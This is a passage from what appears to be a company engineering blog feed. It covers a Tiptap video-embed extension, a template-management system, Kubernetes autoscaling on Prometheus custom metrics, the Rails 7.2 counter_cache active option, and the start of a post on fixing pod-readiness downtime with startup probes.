  name: &quot;embed&quot;, // A unique identifier for the Node
  group: &quot;block&quot;, // Belongs to the &quot;block&quot; group of extensions
  //...
});</code></pre><h3>Attributes</h3><p><a href="https://tiptap.dev/docs/editor/guide/custom-extensions#attributes">Attributes</a> store extra information about a node and are rendered as HTML attributes by default. They are parsed from the content during initialization.</p><pre><code class="language-javascript">const Embed = Node.create({
  //...
  
addAttributes() {
    return {
      src: { default: null },
      title: { default: null },
      frameBorder: { default: &quot;0&quot; },
      allow: {
        default:
          &quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;,
      },
      allowfullscreen: { default: &quot;allowfullscreen&quot; },
      figheight: {
        default: 281,
        parseHTML: element =&gt; element.getAttribute(&quot;figheight&quot;),
      },
      figwidth: {
        default: 500,
        parseHTML: element =&gt; element.getAttribute(&quot;figwidth&quot;),
      },
    };
  },
});</code></pre><p>These attributes customize the video embed behavior:</p><ul><li><strong>src</strong>: Specify the URL of the video you want to embed.</li><li><strong>title</strong>: Add additional information about the video (optional).</li><li><strong>frameBorder</strong>: Set to &quot;0&quot; for seamless integration (default).</li><li><strong>allow</strong>: Define various permissions for optimal video experience (default value provided).</li><li><strong>allowfullscreen</strong>: Enable fullscreen mode (default).</li><li><strong>figheight &amp; figwidth</strong>: Control the video frame's size.</li></ul><h3>Render HTML</h3><p>The <a href="https://tiptap.dev/docs/editor/guide/custom-extensions#render-html">renderHTML</a> function controls how an extension is rendered to HTML.</p><pre><code class="language-javascript">import { Node, mergeAttributes } from &quot;@tiptap/core&quot;;

const Embed = Node.create({
  //...
  
renderHTML({ HTMLAttributes, node }) {
    const { align, figheight, figwidth } = node.attrs;

    return [
      &quot;div&quot;,
      {
        class: `neeto-editor__video-wrapper neeto-editor__video--${align}`,
      },
      [
        &quot;div&quot;,
        {
          class: &quot;neeto-editor__video-iframe&quot;,
          style: `width: ${figwidth}px; height: ${figheight}px;`,
        },
        [
          &quot;iframe&quot;,
          mergeAttributes(this.options.HTMLAttributes, {
            ...HTMLAttributes,
          }),
        ],
      ],
    ];
  },
});</code></pre><p>This renders the following HTML content:</p><pre><code class="language-jsx">&lt;div class=&quot;neeto-editor__video-wrapper neeto-editor__video--center&quot;&gt;
  &lt;div class=&quot;neeto-editor__video-iframe&quot; style=&quot;width: 500px; height: 281px&quot;&gt;
    &lt;iframe
      src=&quot;&lt;src of the embed&gt;&quot;
      title=&quot;&lt;title of the embed&gt;&quot;
      frameborder=&quot;0&quot;
      allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;
      allowfullscreen=&quot;allowfullscreen&quot;
      figheight=&quot;281&quot;
      figwidth=&quot;500&quot;
      align=&quot;center&quot;
    &gt;&lt;/iframe&gt;
  &lt;/div&gt;
&lt;/div&gt;</code></pre><h3>Parse HTML</h3><p>The <a href="https://tiptap.dev/docs/editor/guide/custom-extensions#parse-html">parseHTML</a> function loads the editor document from HTML by receiving an HTML DOM element as input and returning an object with attributes and their values.</p><pre><code class="language-javascript">const Embed = Node.create({
  //...
  
parseHTML() {
    return [{ tag: &quot;iframe[src]&quot; }];
  },
});</code></pre><p>This ensures that whenever Tiptap encounters an <code>&lt;iframe&gt;</code> tag with an <code>src</code> attribute, our custom &quot;embed&quot; Node renders our custom UI.</p><h3>Commands</h3><p><a href="https://tiptap.dev/docs/editor/api/commands">Commands</a> help us to easily modify or alter a selection programmatically. For our embed extension, let's write a command to insert the embed node.</p><pre><code class="language-javascript">const Embed = Node.create({
  //...
  addCommands() {
    return {
      setExternalVideo:
        options =&gt;
        ({ commands }) =&gt;
          commands.insertContent({ type: this.name, attrs: options }),
    };
  },
});</code></pre><p>This is how a command can be executed:</p><pre><code class="language-javascript">editor
  .chain()
  .setExternalVideo({ src: &quot;https://www.youtube.com/embed/3sQv3Xh3Gt4&quot; })
  .run();</code></pre><h3>NodeView</h3><p>Node views in TipTap enable customization for interactive nodes in your editor.</p><p>You can learn more about Node views with React <a href="https://tiptap.dev/docs/editor/guide/node-views/react">here</a>.</p><p>This is what your node extension could look like:</p><pre><code class="language-jsx">import { Node } from &quot;@tiptap/core&quot;;
import { ReactNodeViewRenderer } from &quot;@tiptap/react&quot;;

import Component from &quot;./Component.jsx&quot;;

export default Node.create({
  // configuration
  addNodeView() {
    return ReactNodeViewRenderer(Component);
  },
});</code></pre><blockquote><p>Note: The <code>ReactNodeViewRenderer</code> passes a few very helpful props to your custom React component.</p></blockquote><p>This is what our Embed component looks like:</p><pre><code class="language-jsx">import React from &quot;react&quot;;

import { NodeViewWrapper } from &quot;@tiptap/react&quot;;
import { mergeRight } from &quot;ramda&quot;;
import { Resizable } from &quot;re-resizable&quot;;

import Menu from 
&quot;../Image/Menu&quot;;

const EmbedComponent = ({
  node,
  editor,
  getPos,
  updateAttributes,
  deleteNode,
}) =&gt; {
  const { figheight, figwidth, align } = node.attrs;
  const { view } = editor;
  let height = figheight;
  let width = figwidth;

  const handleResize = (_event, _direction, ref) =&gt; {
    height = ref.offsetHeight;
    width = ref.offsetWidth;
    view.dispatch(
      view.state.tr.setNodeMarkup(
        getPos(),
        undefined,
        mergeRight(node.attrs, {
          figheight: height,
          figwidth: width,
          height,
          width,
        })
      )
    );
    editor.commands.focus();
  };

  return (
    &lt;NodeViewWrapper
      className={`neeto-editor__video-wrapper neeto-editor__video--${align}`}
    &gt;
      &lt;Resizable
        lockAspectRatio
        className=&quot;neeto-editor__video-iframe&quot;
        size={{ height, width }}
        onResizeStop={handleResize}
      &gt;
        {/* Menu component to handle alignment and delete */}
        &lt;Menu {...{ align, deleteNode, editor, updateAttributes }} /&gt;
        &lt;iframe {...node.attrs} /&gt;
      &lt;/Resizable&gt;
    &lt;/NodeViewWrapper&gt;
  );
};

export default EmbedComponent;</code></pre><p>The <code>NodeViewWrapper</code> component is a wrapper for the custom component provided by TipTap. 
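</p><p>To make the resize flow concrete: before dispatching the transaction, <code>handleResize</code> merges the measured dimensions into the node's existing attributes (via Ramda's <code>mergeRight</code>). A minimal sketch of that merge step, using a hypothetical helper name that is not part of the actual component:</p>

```javascript
// Hypothetical helper illustrating the attribute merge handleResize
// performs before view.dispatch: the measured height/width are written
// to both the fig* attributes and the plain height/width attributes.
const mergeResizeAttrs = (attrs, height, width) => ({
  ...attrs,
  figheight: height,
  figwidth: width,
  height,
  width,
});
```

<p>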
The <code>Resizable</code> component is used to resize the embed node.</p><h2>Putting it all together</h2><p>Here's the final output of the Embed extension in neetoEditor:</p><pre><code class="language-javascript">import { Node, mergeAttributes, PasteRule } from &quot;@tiptap/core&quot;;
import { ReactNodeViewRenderer } from &quot;@tiptap/react&quot;;
import { TextSelection } from &quot;prosemirror-state&quot;;

import { COMBINED_REGEX } from &quot;common/constants&quot;;

import EmbedComponent from &quot;./EmbedComponent&quot;;
import { validateUrl } from &quot;./utils&quot;;

export default Node.create({
  name: &quot;embed&quot;,

  addOptions() {
    return { inline: false, HTMLAttributes: {} };
  },

  inline() {
    return this.options.inline;
  },

  group() {
    return this.options.inline ? &quot;inline&quot; : &quot;block&quot;;
  },

  addAttributes() {
    return {
      src: { default: null },
      title: { default: null },
      frameBorder: { default: &quot;0&quot; },
      allow: {
        default:
          &quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;,
      },
      allowfullscreen: { default: &quot;allowfullscreen&quot; },
      figheight: {
        default: 281,
        parseHTML: element =&gt; element.getAttribute(&quot;figheight&quot;),
      },
      figwidth: {
        default: 500,
        parseHTML: element =&gt; element.getAttribute(&quot;figwidth&quot;),
      },
      align: {
        default: &quot;center&quot;,
        parseHTML: element =&gt; element.getAttribute(&quot;align&quot;),
      },
    };
  },

  parseHTML() {
    return [{ tag: &quot;iframe[src]&quot; }];
  },

  renderHTML({ HTMLAttributes, node }) {
    const { align, figheight, figwidth } = node.attrs;

    return [
      &quot;div&quot;,
      {
        class: `neeto-editor__video-wrapper neeto-editor__video--${align}`,
      },
      [
        &quot;div&quot;,
        {
          class: &quot;neeto-editor__video-iframe&quot;,
          style: `width: ${figwidth}px; height: 
${figheight}px;`,
        },
        [
          &quot;iframe&quot;,
          mergeAttributes(this.options.HTMLAttributes, {
            ...HTMLAttributes,
          }),
        ],
      ],
    ];
  },

  addNodeView() {
    return ReactNodeViewRenderer(EmbedComponent);
  },

  addCommands() {
    return {
      setExternalVideo:
        options =&gt;
        ({ commands }) =&gt;
          commands.insertContent({ type: this.name, attrs: options }),
    };
  },

  addPasteRules() {
    return [
      new PasteRule({
        find: COMBINED_REGEX,
        handler: ({ state, range, match }) =&gt; {
          state.tr.delete(range.from, range.to);
          state.tr.setSelection(
            TextSelection.create(state.doc, range.from + 1)
          );
          const validatedUrl = validateUrl(match[0]);
          if (validatedUrl) {
            const node = state.schema.nodes[&quot;embed&quot;].create({
              src: validatedUrl,
            });
            state.tr.insert(range.from, node);
            state.tr.insert(
              range.from + node.nodeSize + 1,
              state.schema.nodes.paragraph.create()
            );
            state.tr.setSelection(
              TextSelection.create(state.tr.doc, range.from + node.nodeSize + 1)
            );
          }
        },
      }),
    ];
  },
});</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Exploring management of templates across Neeto products using neeto-templates-nano]]></title>
       <author><name>Sooraj Bhaskaran</name></author>
      <link href="https://www.bigbinary.com/blog/how-build-neeto-templates-nano"/>
      <updated>2024-07-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-build-neeto-templates-nano</id>
      <content type="html"><![CDATA[<h2>Overview</h2><p><code>neeto-templates-nano</code> serves as an incredibly flexible and user-friendly template builder within the Neeto ecosystem. In this blog post, we will explore the evolution from previous approaches to the development of <strong>neeto-templates-nano</strong> and how it effectively addresses the challenges encountered.</p><h2>Evolution of templates at NeetoSite</h2><p><a href="https://www.neeto.com/neetosite">NeetoSite</a> is a website builder.</p><p>Before the advent of <code>neeto-templates-nano</code>, NeetoSite relied on three tables - <strong>templates_sites</strong>, <strong>templates_pages</strong>, and <strong>template_blocks</strong> - to store site, page, and block data for templates. This structure duplicated the schema already employed in NeetoSite for sites, pages, and blocks, resulting in redundancy.</p><p>Another challenge arose with the storage of each template in a YAML file, necessitating a custom rake task for maintenance. Tasks like updating templates, such as changing font families, required laborious manual edits to every YAML file, affecting scalability and maintainability.</p><p>This <strong>YAML</strong> snippet portrays the complexity of maintaining templates. 
The need for manual edits in each YAML file hampers scalability and maintainability.</p><pre><code class="language-yaml">## Example of a template in YAML format
name: Document Signer
keywords: &quot;E-signature, AI, Cost effective, Paperless&quot;
pages:
  - name: &quot;Home&quot;
    url: &quot;/&quot;
    blocks:
      - name: &quot;header_with_logo_title&quot;
        category: &quot;header&quot;
        kind: &quot;header_with_logo_title&quot;
        identifier: &quot;Header&quot;
        configurations:
          design:
            body:
              border:
                borderColor: &quot;#FFFFFF&quot;
                borderStyle: none
                borderWidth: 0
              backgroundColor: &quot;#FFFFFF&quot;
              paddingVertical: 8
              paddingHorizontal: 48
            logo:
              height: 52
            links:
              color: &quot;#1F2433&quot;
              fontSize: &quot;1em&quot;
              fontFamily: Lato
              fontWeight: 500
              letterSpacing: 0
            buttons:
              color: &quot;#ffffff&quot;
              border:
                borderColor: &quot;#f4620c&quot;
                borderStyle: solid
                borderWidth: 1
              fontSize: &quot;0.875em&quot;
              fontFamily: Open Sans
              fontWeight: 500
              borderRadius: 9999
              letterSpacing: 0
              backgroundColor: &quot;#f4620c&quot;
            logoTitle:
              color: &quot;#1F2433&quot;
              fontSize: &quot;0.875em&quot;
              fontFamily: Inter
              fontWeight: 500
              letterSpacing: 0
            hamburgerMenu:
              color: &quot;#000000&quot;
          properties:
            logo:
              alt: Max Chat
              url: &quot;#!&quot;
              title: &quot;&quot;
            links:
              - to: &quot;#Clients&quot;
                label: Clients
                action: internal
              - to: &quot;#Insights&quot;
                label: Insights
                action: internal
            position: sticky
            enableAnimation: true</code></pre><p>Recognizing these challenges, we opted for a more scalable and maintainable solution.</p><h2>The neeto-templates-nano solution</h2><h3>Eliminating redundancy</h3><p>To streamline template creation and management, <strong>neeto-templates-nano</strong> introduces a comprehensive solution. It includes a frontend package, <a href="https://www.npmjs.com/package/@bigbinary/neeto-templates-frontend">@bigbinary/neeto-templates-frontend</a>, and a Ruby gem, <strong>neeto-templates-engine</strong> (private gem).</p><h3>Architecture</h3><p>The architecture addresses redundancy by whitelisting the <code>templates</code> organization for template creation. Once a site is constructed from the <strong>templates</strong> organization and published, it becomes a template accessible from other organizations.</p><p><img src="/blog_images/2024/how-build-neeto-templates-nano/architecture.png" alt="Architecture"></p><p>In this illustration, we've published 5 sites at the <code>templates</code> organization of <a href="https://www.neeto.com/neetosite">NeetoSite</a>. After publication, the sites become accessible to users across all organizations. Choosing any template will clone it from the <strong>templates</strong> organization to the user's organization. This straightforward mechanism simplifies the management and sharing of templates across different organizations.</p><p>The <code>CreateTemplateModal</code>, exported from <code>@bigbinary/neeto-templates-frontend</code>, allows users to see and select templates when creating a new site.</p><p><img src="/blog_images/2024/how-build-neeto-templates-nano/create_templates_screen.gif" alt="CreateTemplateModal"></p><p>This GIF shows how simple it is to browse through available templates using the <code>CreateTemplateModal</code>. 
Users can preview templates, pick the one that suits their needs, and quickly start their projects without reinventing the wheel.</p><h3>Advantages of porting to neeto-templates-nano</h3><ol><li><p><strong>Effortless Template Management:</strong> With neeto-templates-nano, managing templates is a breeze. Administrators can easily add, update, or delete templates by accessing the templates organization and simply publishing the changes. This streamlines the template lifecycle, ensuring that users always have access to the latest versions.</p></li><li><p><strong>Enhanced Template Customization:</strong> neeto-templates-nano introduces new customizations that enable administrators to add tags and cover images for templates directly within the templates organization. This functionality enhances the visual appeal of templates and facilitates better organization and searchability. Administrators can tailor templates to specific project requirements, improving overall user experience and productivity.</p></li></ol><h3>Implementation across Neeto products</h3><p><strong>neeto-templates-nano</strong> has been seamlessly integrated into <a href="https://www.neeto.com/neetoform">NeetoForm</a> and <a href="https://www.neeto.com/neetosite">NeetoSite</a>, offering a standardized approach to template management across all Neeto products.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring the Kubernetes Horizontal Pod Autoscaler to scale based on custom metrics from Prometheus]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/prometheus-adapter"/>
      <updated>2024-07-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/prometheus-adapter</id>
      <content type="html"><![CDATA[<p>Some of the major upsides of using Kubernetes to manage deployments are the self-healing and autoscaling capabilities of Kubernetes. If a deployment has a sudden spike of traffic, Kubernetes will automatically spin up new containers and handle that load gracefully. It will also scale down deployments when the traffic reduces.</p><p>Kubernetes has <a href="https://www.bigbinary.com/blog/solving-scalability-in-neeto-deploy#understanding-kubernetes-autoscalers">a couple of different ways</a> to scale deployments automatically based on the load the application receives. The <a href="https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/">Horizontal Pod Autoscaler (HPA)</a> can be used out of the box in a Kubernetes cluster to increase or decrease the number of Pods of your deployment. By default, HPA supports scaling based on CPU and memory usage, served by the <a href="https://kubernetes.io/docs/tasks/debug/debug-cluster/resource-metrics-pipeline/#metrics-server">metrics server</a>.</p><p>While building <a href="https://neeto.com/neetodeploy">NeetoDeploy</a> initially, we'd set it up to scale deployments based on CPU and memory usage, since these were the default metrics supported by the HPA. However, later we wanted to scale deployments based on the average response time of our application.</p><p>This is an example of a case where the metric we want to scale on is not directly related to the CPU or the memory usage. Other examples of this could be network metrics from the load balancer, like the number of requests received in the application. In this blog, we will discuss how we achieved autoscaling of deployments in Kubernetes based on the average response time using <a href="https://github.com/kubernetes-sigs/prometheus-adapter">prometheus-adapter</a>.</p><p>When an application receives a lot of requests suddenly, this creates a spike in the average response time. 
The CPU and memory metrics also spike, but they take longer to catch up. In such cases, being able to scale deployments based on the response time will ensure that the spike in traffic is handled gracefully.</p><p><a href="https://prometheus.io/">Prometheus</a> is one of the most popular cloud native monitoring tools, and the Kubernetes HPA can be extended to scale deployments based on metrics exposed by Prometheus. We used the <code>prometheus-adapter</code> to build autoscaling based on the average response time in <a href="https://neeto.com/neetodeploy">NeetoDeploy</a>.</p><h2>Setting up the custom metrics</h2><p>We took the following steps to make our HPAs work with Prometheus metrics.</p><ol><li>Installed <code>prometheus-adapter</code> in our cluster.</li><li>Configured the metric we wanted for our HPAs as a custom metric in the <code>prometheus-adapter</code>.</li><li>Confirmed that the metric is added to the <code>custom.metrics.k8s.io</code> API endpoint.</li><li>Configured an HPA with the custom metric.</li></ol><h2>Install prometheus-adapter in the cluster</h2><p><a href="https://github.com/kubernetes-sigs/prometheus-adapter">prometheus-adapter</a> is an implementation of the <code>custom.metrics.k8s.io</code> API using Prometheus. 
We used the prometheus-adapter to set up Kubernetes metrics APIs for our Prometheus metrics, which can then be used with our HPAs.</p><p>We installed <code>prometheus-adapter</code> in our cluster using <a href="https://helm.sh/">Helm</a>. We got a template for the values file for the Helm installation <a href="https://github.com/prometheus-community/helm-charts/blob/main/charts/prometheus-adapter/values.yaml">here</a>.</p><p>We made a few changes to the file before we applied it to our cluster and deployed <code>prometheus-adapter</code>:</p><ol><li>We made sure that the Prometheus deployment is configured properly by giving the correct service URL and port.</li></ol><pre><code class="language-yaml"># values.yaml
prometheus:
  # Value is templated
  url: http://prometheus.monitoring.svc.cluster.local
  port: 9090
  path: &quot;&quot;
# ... rest of the file</code></pre><ol start="2"><li>We made sure that the custom metrics that we needed for our HPA are configured under <code>rules.custom</code> in the <code>values.yaml</code> file. 
In the following example, we are using the custom metric <code>traefik_service_avg_response_time</code>, since we'll be using that to calculate the average response time for each deployment.</li></ol><pre><code class="language-yaml"># values.yaml
rules:
  default: false
  custom:
    - seriesQuery: '{__name__=~&quot;traefik_service_avg_response_time&quot;, service!=&quot;&quot;}'
      resources:
        overrides:
          app_name:
            resource: service
          namespace:
            resource: namespace
      metricsQuery: traefik_service_avg_response_time{&lt;&lt;.LabelMatchers&gt;&gt;}</code></pre><p>Once we configured our <code>values.yaml</code> file properly, we installed <code>prometheus-adapter</code> in our cluster with Helm.</p><pre><code class="language-bash">helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
helm repo update
helm install prom-adapter prometheus-community/prometheus-adapter --values values.yaml</code></pre><h2>Query for custom metric</h2><p>Once we got <code>prometheus-adapter</code> running, we queried our cluster to check if the custom metric is coming up in the <code>custom.metrics.k8s.io</code> API endpoint.</p><pre><code class="language-bash">kubectl get --raw /apis/custom.metrics.k8s.io/v1beta1 | jq</code></pre><p>The response looked like this:</p><pre><code class="language-json">{
  &quot;kind&quot;: &quot;APIResourceList&quot;,
  &quot;apiVersion&quot;: &quot;v1&quot;,
  &quot;groupVersion&quot;: &quot;custom.metrics.k8s.io/v1beta1&quot;,
  &quot;resources&quot;: [
    {
      &quot;name&quot;: &quot;services/traefik_service_avg_response_time&quot;,
      &quot;singularName&quot;: &quot;&quot;,
      &quot;namespaced&quot;: true,
      &quot;kind&quot;: &quot;MetricValueList&quot;,
      &quot;verbs&quot;: [&quot;get&quot;]
    },
    {
      &quot;name&quot;: &quot;namespaces/traefik_service_avg_response_time&quot;,
      &quot;singularName&quot;: &quot;&quot;,
      &quot;namespaced&quot;: false,
      &quot;kind&quot;: 
&quot;MetricValueList&quot;,
      &quot;verbs&quot;: [&quot;get&quot;]
    }
  ]
}</code></pre><p>We also queried the metric API for a particular service we've configured the metric for. Here, we're querying the <code>traefik_service_avg_response_time</code> metric for the <code>neeto-chat-web-staging</code> app in the default namespace.</p><pre><code>kubectl get --raw /apis/custom.metrics.k8s.io/v1beta1/namespaces/default/services/neeto-chat-web-staging/traefik_service_avg_response_time | jq</code></pre><p>The API response gave the following.</p><pre><code class="language-json">{
  &quot;kind&quot;: &quot;MetricValueList&quot;,
  &quot;apiVersion&quot;: &quot;custom.metrics.k8s.io/v1beta1&quot;,
  &quot;metadata&quot;: {},
  &quot;items&quot;: [
    {
      &quot;describedObject&quot;: {
        &quot;kind&quot;: &quot;Service&quot;,
        &quot;namespace&quot;: &quot;default&quot;,
        &quot;name&quot;: &quot;neeto-chat-web-staging&quot;,
        &quot;apiVersion&quot;: &quot;/v1&quot;
      },
      &quot;metricName&quot;: &quot;traefik_service_avg_response_time&quot;,
      &quot;timestamp&quot;: &quot;2024-02-26T19:31:33Z&quot;,
      &quot;value&quot;: &quot;19m&quot;,
      &quot;selector&quot;: null
    }
  ]
}</code></pre><p>From the response, we can see that the average response time at that instant is reported as <code>19m</code> (Kubernetes milli-units), i.e. 19ms.</p><h2>Create the HPA</h2><p>Now that we're sure that <code>prometheus-adapter</code> is able to serve custom metrics under the <code>custom.metrics.k8s.io</code> API, we wired this up with a Horizontal Pod Autoscaler to scale our deployments based on our custom metric.</p><pre><code class="language-yaml">apiVersion: autoscaling/v2
kind: HorizontalPodAutoscaler
metadata:
  name: my-app-name-hpa
spec:
  scaleTargetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: my-app-name-deployment
  minReplicas: 1
  maxReplicas: 10
  metrics:
    - type: Object
      object:
        metric:
          name: traefik_service_avg_response_time
          selector: { 
matchLabels: { app_name: my-app-name } }
        describedObject:
          apiVersion: v1
          kind: Service
          name: my-app-name
        target:
          type: Value
          value: 0.03</code></pre><p>With everything set up, the HPA was able to fetch the custom metric scraped by Prometheus and scale our Pods up and down based on the value of the metric. We also created a recording rule in Prometheus for storing our custom metric queries and dropped the unwanted labels as a best practice. We can use the custom metric stored with the recording rule directly with <code>prometheus-adapter</code> to expose the metrics as an API endpoint in Kubernetes. This is helpful when your custom metric queries are complex.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without any change. If you want to give NeetoDeploy a try, then please send us an email at invite@neeto.com.</p><p>If you have questions about NeetoDeploy or want to see the journey, follow NeetoDeploy on <a href="https://twitter.com/neetodeploy">X</a>. You can also join our <a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about any Neeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 7.2 makes counter_cache integration safer and easier]]></title>
       <author><name>Navaneeth D</name></author>
      <link href="https://www.bigbinary.com/blog/rails-8-adds-ability-to-ignore-counter_cache-column-while-backfilling"/>
      <updated>2024-07-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-8-adds-ability-to-ignore-counter_cache-column-while-backfilling</id>
      <content type="html"><![CDATA[<p>Counter caches are a cornerstone of performance optimization in Rails applications. They efficiently keep track of the number of associated records for a model, eliminating the need for frequent database queries. However, adding counter caches to existing applications, especially those with large tables, can often be challenging. Rails 7.2 brings an exciting update to address just that!</p><h2>Counter cache integration challenges</h2><p>When introducing counter caches to large datasets, developers often encounter two primary challenges:</p><ul><li>Backfilling data efficiently: Adding a counter cache column to an existing table with a substantial amount of data can be problematic. Backfilling the counter cache values separately from the column addition is necessary to prevent prolonged table locks, which can significantly impact application performance. This process requires careful consideration to ensure data integrity while minimizing downtime and avoiding disruptions to user experience.</li><li>Ensuring data consistency: Once the counter cache is in place, maintaining data consistency becomes paramount. Methods such as <code>size</code>, <code>any?</code>, and others that utilize counter caches internally must return accurate results. However, during the backfilling process, relying solely on the counter cache may produce incorrect counts until all records are appropriately updated.</li></ul><h2>Safer counter cache implementation in Rails 7.2</h2><p>The new update in Rails 7.2 introduces a feature that allows developers to manage counter caches more effectively, especially in scenarios involving existing large datasets. By introducing the <code>active</code> option in the counter cache configuration, developers can control when the counter cache is actively utilized. This enables them to backfill counter cache columns separately from their addition, minimizing table locks and potential performance issues. 
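To make the two-phase idea concrete, here is a rough sketch of what the separate column addition and batched backfill could look like. The migration and model names are hypothetical, and this assumes a `comments_count` column on `articles`:

```ruby
# Sketch only (hypothetical names). Phase 1 adds the column; phase 2 backfills
# it in batches so the articles table is never locked for long.
class AddCommentsCountToArticles < ActiveRecord::Migration[7.2]
  def change
    add_column :articles, :comments_count, :integer, default: 0, null: false
  end
end

class BackfillArticlesCommentsCount < ActiveRecord::Migration[7.2]
  disable_ddl_transaction! # avoid one long transaction over the whole table

  def up
    Article.unscoped.in_batches(of: 1000) do |batch|
      # reset_counters recomputes the count from the database for each record.
      batch.each { |article| Article.reset_counters(article.id, :comments) }
    end
  end
end
```

This mirrors the common guidance of keeping schema changes and data backfills in separate migrations.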
Once the backfilling process is complete, developers can activate the counter cache, ensuring accurate association counts without compromising application performance.</p><p>Let's illustrate the implementation of this update in Rails using a straightforward example involving a blog application with articles and comments. In our blog application, each article can have multiple comments. We want to add a counter cache to track the number of comments associated with each article. However, our database already contains a significant amount of data, making traditional counter cache implementation challenging.</p><h3>Implementation Steps</h3><ol><li>Define the association: Initially, we define the association between the <code>Article</code> model and the <code>Comment</code> model, specifying the counter cache with the <code>active: false</code> option to keep it inactive during the initial setup.</li></ol><pre><code class="language-ruby">class Comment &lt; ApplicationRecord
  belongs_to :article, counter_cache: { active: false }
end</code></pre><ol start="2"><li><p>Backfill the Counter Cache: With the association configured, we proceed to backfill the counter cache column in the <code>articles</code> table. During this phase, the counter cache remains inactive, and methods like <code>size</code>, <code>any?</code>, etc., retrieve results <strong>directly from the database</strong>. 
This prevents incorrect values from being displayed during backfilling.</p></li><li><p>Activate the Counter Cache: Once the backfilling process is complete, we activate the counter cache by removing the <code>active: false</code> option from the counter cache definition.</p></li></ol><pre><code class="language-ruby">class Comment &lt; ApplicationRecord
  belongs_to :article, counter_cache: true
end</code></pre><p>Upon activation, the counter cache integrates into the association, efficiently tracking the number of comments associated with each article.</p><p>The <code>active</code> option was introduced in <a href="https://github.com/rails/rails/pull/51453">this PR</a>. Check out the full feature discussion <a href="https://discuss.rubyonrails.org/t/new-feature-to-make-introducing-counter-caches-safer-and-easier/85456">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How we fixed app downtime issue in NeetoDeploy]]></title>
       <author><name>Abhishek T</name></author>
      <link href="https://www.bigbinary.com/blog/how-we-fixed-app-down-time-in-neeto-deploy"/>
      <updated>2024-07-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-we-fixed-app-down-time-in-neeto-deploy</id>
      <content type="html"><![CDATA[<p><em>We are building <a href="https://neeto.com/neetoDeploy">NeetoDeploy</a>, a compelling alternative to Heroku. Stay updated by following NeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a> and reading our <a href="https://www.bigbinary.com/blog/categories/neetodeploy">blog</a>.</em></p><p>At <a href="https://www.neeto.com/">neeto</a> we are building 20+ applications, and most of our applications are running in NeetoDeploy. Once we migrated from Heroku to NeetoDeploy, we started getting a 520 response code for our applications. This issue was occurring randomly and rarely.</p><h3>What is a 520 response code?</h3><p>A 520 response code happens when the connection is started on the origin web server, but the request is not completed. This could be due to server crashes or the inability to handle the incoming requests because of insufficient resources.</p><p>When we looked at our logs closely, we found that all the 520 response code situations occurred when we restarted or deployed the app. From this, we concluded that the new pods were failing to handle requests from the client initially and working fine after some time.</p><h3>What is wrong with new pods?</h3><p>Once our investigation narrowed down to the new pods, we quickly realized that requests were arriving at the server even when the server was not yet fully ready to take new requests.</p><p>When we create a new pod in Kubernetes, it is marked as &quot;Ready&quot;, and requests are sent to it as soon as its containers start. However, the servers initiated within these containers may require additional time to boot up and become fully ready to accept the requests.</p><h4>Let's try restarting the application</h4><pre><code class="language-bash">$ kubectl rollout restart deployment bling-staging-web</code></pre><p>As we can see, a new container is getting created for the new pod. The READY status for the new pod is 0. 
It means it's not yet READY.</p><pre><code class="language-bash">NAME                               READY  STATUS             RESTARTS  AGE
bling-staging-web-656f74d9d-6kpzz  1/1    Running            0         2m8s
bling-staging-web-79fc6f978-cdjf5  0/1    ContainerCreating  0         5s</code></pre><p>Now we can see that the new pod is marked as READY (1 out of 1), and the old one is terminating.</p><pre><code class="language-bash">NAME                               READY  STATUS             RESTARTS  AGE
bling-staging-web-656f74d9d-6kpzz  0/1    Terminating        0         2m9s
bling-staging-web-79fc6f978-cdjf5  1/1    Running            0         6s</code></pre><p>The new pod is shown as <code>READY</code> as soon as the container was created. But on checking the logs, we could see that the server was still starting up and not ready yet.</p><pre><code>[1] Puma starting in cluster mode...
[1] Installing dependencies...</code></pre><p>From the above observation, we understood that the pod is marked as &quot;READY&quot; right after the container is created. Consequently, requests are received even before the server is fully prepared to serve them, and they get a 520 response code.</p><h2>Solution</h2><p>To fix this issue, we must ensure that pods are marked as &quot;Ready&quot; only after the server is up and ready to accept the requests. We can do this by using Kubernetes <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/">health probes</a>. More than six years ago we wrote <a href="https://www.bigbinary.com/blog/deploying-rails-applications-using-kubernetes-with-zero-downtime">a blog</a> on how we can leverage the readiness and liveness probes of Kubernetes.</p><h3>Adding Startup probe</h3><p>Initially, we only added a <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/#define-startup-probes">Startup probe</a> since we had a problem with the boot-up phase. 
You can read more about the configuration settings <a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-liveness-readiness-startup-probes/#configure-probes">here</a>.</p><p>The following configuration will add the Startup probe for the deployments:</p><pre><code class="language-yaml">startupProbe:
  failureThreshold: 10
  httpGet:
    path: /health_check
    port: 3000
    scheme: HTTP
  periodSeconds: 5
  successThreshold: 1
  timeoutSeconds: 60
  initialDelaySeconds: 10</code></pre><p><code>/health_check</code> is a route in the application that is expected to return a 200 response code if all is going well. Now, let's restart the application again after adding the Startup probe.</p><p>A container is created for the new pod, but the pod is still not &quot;Ready&quot;.</p><pre><code class="language-bash">NAME                               READY  STATUS            RESTARTS  AGE
bling-staging-web-656f74d9d-6kpzz  1/1    Running           0         2m8s
